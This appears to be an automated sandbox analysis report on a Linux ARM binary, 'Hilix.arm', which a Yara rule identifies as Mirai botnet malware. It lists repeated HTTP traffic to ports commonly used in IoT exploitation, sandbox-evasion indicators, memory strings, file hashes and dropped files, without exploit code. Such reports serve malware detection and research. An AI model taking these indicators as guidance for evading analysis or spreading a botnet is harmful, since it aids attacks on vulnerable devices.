Source: unknown	Network traffic detected: HTTP traffic on port 41416 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46366 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57980 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44520 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51628 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47516 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58264 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50634 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39502 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53696 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37990 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37994 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49632 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47584 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45424 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33774
Source: unknown	Network traffic detected: HTTP traffic on port 45428 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33780 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 33780
Source: unknown	Network traffic detected: HTTP traffic on port 49118 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39702 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51620 -> 52869

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/Hilix.arm (PID: 5244)

Queries kernel information via 'uname':

Jump to behavior

Source: Hilix.arm, 5244.1.00000000ea87e5a5.000000005c832e06.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd-agent-1
Source: Hilix.arm, 5244.1.0000000029a6c1e5.00000000e024ef6a.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/Hilix.armSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Hilix.arm
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
Source: Hilix.arm, 5246.1.000000005c832e06.000000004107f861.rw-.sdmp	Binary or memory string: !/usr/bin/qemu-arm!/proc/5285/fd/11
Source: Hilix.arm, 5244.1.00000000ea87e5a5.000000005c832e06.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: Hilix.arm, 5244.1.0000000029a6c1e5.00000000e024ef6a.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm

Stealing of Sensitive Information:

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP

Remote Access Functionality:

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP

ID:	513293
Product:	CloudBasic
Start time:	01:45:33
Start date:	02.11.2021
Sample:	Hilix.arm
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	9653f94dca32a23046c21ffeea172dd6
SHA1:	a7037a2353ddf06c10144563b077c906b92ebbfa
SHA256:	dcd35159cd640f9b66aad91d5dc7d1e81fffd2478c1e44e0f3184db70285040f
Filetype:	ELF Executable and Linkable format (generic) (4004/1) 100.00%

Name	Type	MD5	SHA1	SHA256
/proc/5290/oom_score_adj	ASCII text	CBF282CC55ED0792C33D10003D1F760A	007DD8BD75468E6B7ABA4285E9B267202C7EAEED	FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
/proc/5405/oom_score_adj	ASCII text	CBF282CC55ED0792C33D10003D1F760A	007DD8BD75468E6B7ABA4285E9B267202C7EAEED	FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
/proc/5409/oom_score_adj	ASCII text	CBF282CC55ED0792C33D10003D1F760A	007DD8BD75468E6B7ABA4285E9B267202C7EAEED	FCDBAB99FCC0F4409E5F9D7D6FC497780288B4C441698126BB62832412774D22
/run/sshd.pid	ASCII text	B7E7F61E602E76B7E029FB1017EF47D8	6E59553854D7D99CB393905261B0B22600C3B713	5A7BB77B731A3ECC715295E4F9ED20A306B64677B40260C2940B368339B7C50C

Linux Analysis Report Hilix.arm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Networking:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Network Map

Contacted Public IPs

Contacted URLs